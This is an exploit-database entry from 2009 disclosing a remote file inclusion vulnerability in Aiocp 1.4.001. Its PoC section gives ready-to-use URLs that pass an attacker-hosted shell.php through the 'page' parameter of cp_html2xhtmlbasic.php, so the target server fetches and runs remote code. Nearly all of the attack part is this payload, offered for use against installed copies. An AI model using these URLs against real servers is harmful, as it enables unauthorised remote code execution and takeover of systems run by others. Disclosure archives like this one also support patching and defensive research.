[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Aiocp 1.4.001 File Inclusion Vulnerability
# Published : 2009-10-07
# Author : Hadi Kiamarsi
# Previous Title : The BMW inventory.php SQL Injection
# Next Title : Joomla Recerca component SQL Injection
###########################################
#
# Aiocp 1.4.001 Remote File Inclusion vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download
#
###########################################
PoC :
http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=[SHELL]
example :
http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=http://www.example.com/shell.php
local Example :
http://localhost/root/public/code/cp_html2xhtmlbasic.php?page=http://127.0.0.1/shell.php